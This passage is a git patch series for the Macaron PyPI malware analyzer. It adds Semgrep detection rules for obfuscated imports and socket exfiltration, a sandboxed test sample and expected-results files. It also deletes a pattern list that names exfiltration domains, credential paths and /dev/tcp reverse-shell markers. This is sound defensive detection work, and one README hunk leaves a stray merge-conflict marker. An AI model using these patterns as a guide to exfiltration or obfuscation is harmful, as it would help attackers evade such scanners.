b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 8890a70b6..83d6fa4e0 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,17 +1,17 @@ { "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": [ { - "file": "exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote_exfiltration.py", "start": 31, "end": 31 }, { - "file": "exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote_exfiltration.py", "start": 42, "end": 42 }, { - "file": "exfiltration/remote-exfiltration.py", + "file": "exfiltration/remote_exfiltration.py", "start": 50, "end": 50 } diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index b4f1dce24..405e59905 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,156 +1,156 @@ { - "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 30, - "end": 30 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 67, - "end": 67 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ - { - "file": "obfuscation/tools.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/tools.py", - "start": 25, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/tools.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/tools.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/tools.py", - "start": 30, - "end": 31 - }, - { - "file": "obfuscation/tools.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/tools.py", - "start": 37, - "end": 37 - }, - { - "file": "obfuscation/tools.py", - "start": 39, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 40, - "end": 40 - }, - { - "file": "obfuscation/tools.py", - "start": 41, - "end": 41 - }, - { - "file": "obfuscation/tools.py", - "start": 42, - "end": 42 - }, - { - "file": "obfuscation/tools.py", - "start": 44, - "end": 45 - }, - { - "file": "obfuscation/tools.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/tools.py", - "start": 51, - "end": 51 - }, - { - "file": "obfuscation/tools.py", - "start": 53, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 54, - "end": 54 - }, - { - "file": "obfuscation/tools.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/tools.py", - "start": 56, - "end": 56 - }, - { - "file": "obfuscation/tools.py", - "start": 58, - "end": 59 - }, - { - "file": "obfuscation/tools.py", - "start": 61, - "end": 61 - }, - { - "file": "obfuscation/tools.py", - "start": 65, - "end": 65 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - }, - { - "file": "obfuscation/tools.py", - "start": 68, - "end": 68 - } - ] - } + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ], + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] +} From 1e8f964b74ed24e6b5585fbd96f335cc692bce7a Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 11:55:06 +1000 Subject: [PATCH 21/37] fix: obfuscation rules has updated socket patterns Signed-off-by: Carl Flottmann --- .../pypi_malware_rules/obfuscation.yaml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index ab956dfda..c81649715 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -89,9 +89,13 @@ rules: - patterns: - pattern-either: - patterns: - - pattern-inside: | - $SOC = socket.socket(...) - ... + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... - pattern-either: - pattern-inside: | $SOC.connect(...) @@ -106,10 +110,16 @@ rules: - pattern-inside: | $SOC = socket.create_connection(...) ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... # socket.socket and socket.bind in one call - pattern-inside: | $SOC = socket.create_server(...) ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... - pattern-either: # Assume that .accept, .listen was called somewhere if needed - pattern: $SOC.send(...) From 27cce81a509b75f7b0ba362799df64c2307f00c0 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 15:43:02 +1000 Subject: [PATCH 22/37] feat: added new, refined inline imports rule back in Signed-off-by: Carl Flottmann --- .../pypi_malware_rules/obfuscation.yaml | 27 ++++++++ .../obfuscation/expected_results.json | 67 +++++++++++++++++++ .../obfuscation/inline_imports.py | 32 +++++++++ 3 files changed, 126 insertions(+) create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index c81649715..78185ad75 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -2,6 +2,33 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. rules: +- id: obfuscation_inline-imports + metadata: + description: detect suspicious, hardcoded inline imports with immediate use. + message: Found an instance of an immediately used hardcoded inline import. + languages: + - python + severity: ERROR + pattern-either: + - pattern: __import__('base64') + - pattern: __import__('builtins') + - pattern: __import__('subprocess') + - pattern: __import__('sys') + - pattern: __import__('os') + - pattern: __import__('zlib') + - pattern: __import__('marshal') + # python will evaluate a hex/oct string + - patterns: + - pattern: __import__('$HEX') + - metavariable-regex: + metavariable: $HEX + regex: (\\x\d{2})+ + - patterns: + - pattern: __import__('$OCT') + - metavariable-regex: + metavariable: $OCT + regex: (\\\d{3})+ + - id: obfuscation_obfuscation-tools metadata: description: detects the use of python obfuscation packages on the source code diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 405e59905..d3537611e 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -31,6 +31,73 @@ "end": 67 } ], + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ], "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": [ { "file": "obfuscation/obfuscation_tools.py", diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py new file mode 100644 index 000000000..80e006781 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -0,0 +1,32 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + __import__('base64') + __import__('builtins') + __import__('subprocess') + __import__('sys') + __import__('os') + __import__('zlib') + __import__('marshal') + # these both just import builtins + __import__('\142\165\151\154\164\151\156\163') + __import__('\x62\x75\x69\x6c\x74\x69\x6e\x73') From adee95cc491f5de60d96031dade1e41a69040cbf Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 27 Feb 2025 16:12:27 +1000 Subject: [PATCH 23/37] docs: made API docs and updated malware analyzer README Signed-off-by: Carl Flottmann --- ...on.malware_analyzer.pypi_heuristics.sourcecode.rst | 8 ++++++++ src/macaron/malware_analyzer/README.md | 11 +++++++++++ 2 files changed, 19 insertions(+) diff --git a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst index f53afc8d8..50b2b472d 100644 --- a/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst +++ b/docs/source/pages/developers_guide/apidoc/macaron.malware_analyzer.pypi_heuristics.sourcecode.rst @@ -9,6 +9,14 @@ macaron.malware\_analyzer.pypi\_heuristics.sourcecode package Submodules ---------- +macaron.malware\_analyzer.pypi\_heuristics.sourcecode.pypi\_sourcecode\_analyzer module +--------------------------------------------------------------------------------------- + +.. automodule:: macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer + :members: + :undoc-members: + :show-inheritance: + macaron.malware\_analyzer.pypi\_heuristics.sourcecode.suspicious\_setup module ------------------------------------------------------------------------------ diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index d5d30a670..11ec5db73 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -52,6 +52,17 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. +### Experimental: Source Code Analysis with Semgrep + +The following analyzer has been added in as an experimental feature, available by supplying `--analyze-source` in the CLI to `macaron analyze`: + +**PyPI Source Code Analyzer** +- **Description**: Uses Semgrep, with default rules written in `src/macaron/resources/pypi_malware_rules` and custom rules available by supplying a path to `custom_semgrep_rules` in `defaults.ini`, to scan the package `.tar` source code. +- **Rule**: If any Semgrep rule is triggered, the heuristic fails with `HeuristicResult.FAIL` and subsequently fails the package with `CheckResultType.FAILED`. If no rule is triggered, the heuristic passes with `HeuristicResult.PASS` and the `CheckResultType` result from the combination of all other heuristics is maintained. +- **Dependency**: Will be run if the Source Code Repo fails. + +This feature is currently a work in progress, and supports detection of code obfuscation techniques and remote exfiltration behaviors. It uses Semgrep OSS for detection. + ### Contributing When contributing an analyzer, it must meet the following requirements: From 01a47ecd582a8f5170f2af1bdd1f18181bdf5516 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Mar 2025 14:47:17 +1000 Subject: [PATCH 24/37] docs: updated README and CONTRIBUTING for information on how to contribute to the malware analyzer Signed-off-by: Carl Flottmann --- CONTRIBUTING.md | 4 +++ src/macaron/malware_analyzer/README.md | 37 +++++++++++++++++++++++++- 2 files changed, 40 insertions(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 6cc6516fb..3e21b8e57 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -72,6 +72,10 @@ See below for instructions to set up the development environment. - PRs should be merged using the `Squash and merge` strategy. In most cases a single commit with a detailed commit message body is preferred. Make sure to keep the `Signed-off-by` line in the body. +### PyPI Malware Detection Contribution + +Please see the [README for the malware analyzer](./src/macaron/malware_analyzer/README.md) for information on contributing Heuristics and code patterns. + ## Branching model * The `main` branch should be used as the base branch for pull requests. The `release` branch is designated for releases and should only be merged into when creating a new release for Macaron. diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index 11ec5db73..9c083e958 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -1,4 +1,4 @@ -# Implementation of Heuristic Malware Detector +# Implementation of Malware Detector ## PyPI Ecosystem @@ -70,6 +70,7 @@ When contributing an analyzer, it must meet the following requirements: - The analyzer must be implemented in a separate file, placed in the relevant folder based on what it analyzes ([metadata](./pypi_heuristics/metadata/) or [sourcecode](./pypi_heuristics/sourcecode/)). - The analyzer must inherit from the `BaseHeuristicAnalyzer` class and implement the `analyze` function, returning relevant information specific to the analysis. - The analyzer name must be added to [heuristics.py](./pypi_heuristics/heuristics.py) file so it can be used for rule combinations in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) +- The analyzer must be added to the list of analyzers in `detect_malicious_metadata_check.py` to be run. - Update the `malware_rules_problog_model` in [detect_malicious_metadata_check.py](../slsa_analyzer/checks/detect_malicious_metadata_check.py) with logical statements where the heuristic should be included. When adding new rules, please follow the following guidelines: - Provide a [confidence value](../slsa_analyzer/checks/check_result.py) using the `Confidence` enum. - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. @@ -77,6 +78,40 @@ When contributing an analyzer, it must meet the following requirements: - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). +**Contributing Code Pattern Rules** + +When contributing more Semgrep rules for `pypi_sourcecode_analyzer.py` to use, the following requirements must be met: + +- Semgrep `.yaml` Rules are stored in `src/macaron/resources/pypi_malware_rules` and are named based on the category of code behaviors they detect. +- If the rule comes under one of the already defined categories, place it within that `.yaml` file, else create a new `.yaml` file using the category name. +- Each rule ID must be prefixed by the category followed by a single underscore ('_'), so for obfuscation rules in `obfuscation.yaml` each rule ID is prefixed with `obfuscation_`, followed by an ID which uses a hiphen ('-') as a separator. +- Tests must be written for each rule contributed. These are stored in `tests/malware_analyzer/pypi/test_pypi_sourcescode_analyzer.py`. +- These tests are written on a per-category bases, running each category individually. Each category must have a folder under `tests/malware_analyzer/pypi/resources/sourcecode_samples`. +- Within these folders, there must be sample code patterns for testing, and a file `expected_results.json` with the expected JSON output of the analyzer for that category. +- Each sample code pattern `.py` file must not have executable permissions and must include code that prevents it from being accidentally imported or run. The current files use this method: + +``` +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() +``` +>>>>>>> ae5a748 (docs: updated README and CONTRIBUTING for information on how to contribute to the malware analyzer) + ### Confidence Score Motivation The original seven heuristics which started this work were Empty Project Link, Unreachable Project Links, One Release, High Release Frequency, Unchange Release, Closer Release Join Date, and Suspicious Setup. These heuristics (excluding those with a dependency) were run on 1167 packages from trusted organizations, with the following results: From 8bd4c0f2323d4d079ed6b147571e108256ddddba Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Mar 2025 14:51:58 +1000 Subject: [PATCH 25/37] chore: removed old unused suspicious pattern yaml file. preserved in a branch off staging. Signed-off-by: Carl Flottmann --- .../sourcecode/suspicious_patterns.yaml | 101 ------------------ 1 file changed, 101 deletions(-) delete mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml deleted file mode 100644 index 3838e23a7..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_patterns.yaml +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - - -#This file defines the malicious pattern. -#The pattern is collected from the malware repository of Pypi.org. -imports: -- requests -- base64 -- Fernet -- telebot -- platform -- ClientSession -- socket -- os -- getpass -- telegram -- __pyarmor__ -- urllib.request.urlopen -- subprocess -- Request - -calls: - os_detection: - - os.name - code_execution: - - exec - - subprocess.run - - subprocess.call - - subprocess.Popen - - subprocess.check_call - - os.system - info_collecting: - - os.getcwd - - os.getlogin - - os.getenv - - os.environ - - os.uname - - getpass.getuser - - socket.gethostname - - platform.node - - platform.system - - platform.version - - keyboard.on_release - obfuscation: - - base64.b64decode - - __pyarmor__ - # - Fernet.decrypt - remote_connection: - - requests.get - - requests.post - - telegram.send_document - - urllib.request.urlopen - - urllib.request.urlretrieve - - Request - - socket.socket - custom_setup: - - install - reverse_shell: - - os.dup2 - -constants: - domains: - - webhook.site - - discord - - cdn.discordapp.com - - oast.fun - - api.telegram.org - - diddlydingusdu.de # builderknower2 - - pipedream.net # business-kpi-manager - - 2.tcp.ngrok.io - - files.pypihosted.org - - filebin.net - - akinasouls.fr - - api.ipify.org # Get public IP of the victim - - httpbin.or - - ngrok.ap - - oastify.com - - pythonanywhere.com - - deliverycontent.online - local_path: - - /storage/emulated/0 # Android: primary user account on the device - - /etc/resolv.conf # DNS - - /etc/hosts # DNS - - /sys/class/net # Network related - - /run/systemd/resolve/stub-resolv.conf - - /sdcard/DCIM # Photo storage - executable: - - .exe - windows: - - APPDATA - - Start-Process # Execute command - - powershell - reverse_shell: - - /dev/tcp - os_detection: - - nt # Windows - - Windows - - Darwin # MacOS - - Linux - - posix # Linux From 79391f1b223fd9bc932dd9fb8244e6a404ccda10 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 11 Mar 2025 09:49:28 +1000 Subject: [PATCH 26/37] chore: updated sample permissions checker to have better error output Signed-off-by: Carl Flottmann --- .../dev_scripts/samples_permissions_checker.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh index dc92366f0..fcbd3658b 100755 --- a/scripts/dev_scripts/samples_permissions_checker.sh +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -8,6 +8,23 @@ # failing if any do. # +# Strict bash options. +# +# -e: exit immediately if a command fails (with non-zero return code), +# or if a function returns non-zero. +# +# -u: treat unset variables and parameters as error when performing +# parameter expansion. +# In case a variable ${VAR} is unset but we still need to expand, +# use the syntax ${VAR:-} to expand it to an empty string. +# +# -o pipefail: set the return value of a pipeline to the value of the last +# (rightmost) command to exit with a non-zero status, or zero +# if all commands in the pipeline exit successfully. +# +# Reference: https://www.gnu.org/software/bash/manual/html_node/The-Set-Builtin.html. +set -euo pipefail + MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. && pwd)" SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" From 6b4cb7149a8ca6b352c25eeeaa53429afe311070 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 17 Mar 2025 16:59:38 +1000 Subject: [PATCH 27/37] chore: included semgrep message for each rule in JSON output for explanation Signed-off-by: Carl Flottmann --- .../sourcecode/pypi_sourcecode_analyzer.py | 15 +- .../pypi_malware_rules/exfiltration.yaml | 4 +- .../pypi_malware_rules/obfuscation.yaml | 12 +- .../exfiltration/expected_results.json | 37 +- .../obfuscation/expected_results.json | 451 +++++++++--------- 5 files changed, 267 insertions(+), 252 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index b6702b53a..82e2406af 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -12,7 +12,6 @@ import os import subprocess # nosec import tempfile -from collections import defaultdict from macaron.config.defaults import defaults from macaron.config.global_config import global_config @@ -146,7 +145,7 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes HeuristicAnalyzerValueError if there is no source code available. """ - analysis_result: defaultdict = defaultdict(list) + analysis_result: dict = {} # only run semgrep open-source features, and disable 'nosemgrep' ignoring so this does not bypass our scan semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] result: HeuristicResult = HeuristicResult.PASS @@ -189,15 +188,19 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes result = HeuristicResult.FAIL # some semgrep rules were triggered for finding in semgrep_findings: - category = json_extract(finding, ["check_id"], str) + rule_id = json_extract(finding, ["check_id"], str) file = json_extract(finding, ["path"], str) - if not category or not file: + if not rule_id or not file: continue file = os.path.relpath(file, os.path.dirname(source_code_path)) start = json_extract(finding, ["start", "line"], int) end = json_extract(finding, ["end", "line"], int) + message = json_extract(finding, ["extra", "message"], str) - analysis_result[category].append({"file": file, "start": start, "end": end}) + if rule_id not in analysis_result: + analysis_result[rule_id] = {"message": message, "detections": []} - return result, dict(analysis_result) + analysis_result[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + return result, analysis_result diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index 4eee8d033..fd96eeef0 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -4,8 +4,8 @@ rules: - id: exfiltration_remote-exfiltration metadata: - description: Identifies the flow of sensitive information to a remote endpoint. - message: Detected exfiltration of sensitive data to a remote endpoint. + description: Detects the flow of sensitive information to a remote endpoint. + message: Detected exfiltration of sensitive data to a remote endpoint languages: - python severity: ERROR diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 78185ad75..6d6ea066b 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -4,8 +4,8 @@ rules: - id: obfuscation_inline-imports metadata: - description: detect suspicious, hardcoded inline imports with immediate use. - message: Found an instance of an immediately used hardcoded inline import. + description: Detects use of inline imports with suspicious APIs, or obfuscated API imports. + message: Found an instance of a suspicious API in a hardcoded inline import languages: - python severity: ERROR @@ -31,8 +31,8 @@ rules: - id: obfuscation_obfuscation-tools metadata: - description: detects the use of python obfuscation packages on the source code - message: Found an instance of import and/or using python obfuscation tools + description: Detects the use of common python obfuscation packages. + message: Found an indicator of the use of a python code obfuscation tool languages: - python severity: ERROR @@ -67,8 +67,8 @@ rules: - id: obfuscation_decode-and-execute metadata: - description: detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes - message: detected the flow of a decoded string value to a remote endpoint, process, code evaluation, or file write + description: Detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes. + message: Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write languages: - python severity: ERROR diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json index 83d6fa4e0..95ceffc0f 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -1,19 +1,22 @@ { - "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": [ - { - "file": "exfiltration/remote_exfiltration.py", - "start": 31, - "end": 31 - }, - { - "file": "exfiltration/remote_exfiltration.py", - "start": 42, - "end": 42 - }, - { - "file": "exfiltration/remote_exfiltration.py", - "start": 50, - "end": 50 - } - ] + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": { + "message": "Detected exfiltration of sensitive data to a remote endpoint", + "detections": [ + { + "file": "exfiltration/remote_exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 50, + "end": 50 + } + ] } +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index d3537611e..a905dc12d 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -1,223 +1,232 @@ { - "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 30, - "end": 30 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 47, - "end": 47 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 55, - "end": 55 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 67, - "end": 67 - } - ], - "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": [ - { - "file": "obfuscation/decode_and_execute.py", - "start": 33, - "end": 33 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 38, - "end": 38 - }, - { - "file": "obfuscation/decode_and_execute.py", - "start": 44, - "end": 44 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 23, - "end": 23 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 24, - "end": 24 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 25, - "end": 25 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 26, - "end": 26 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 27, - "end": 27 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 28, - "end": 28 - }, - { - "file": "obfuscation/inline_imports.py", - "start": 29, - "end": 29 - }, - { - "file": 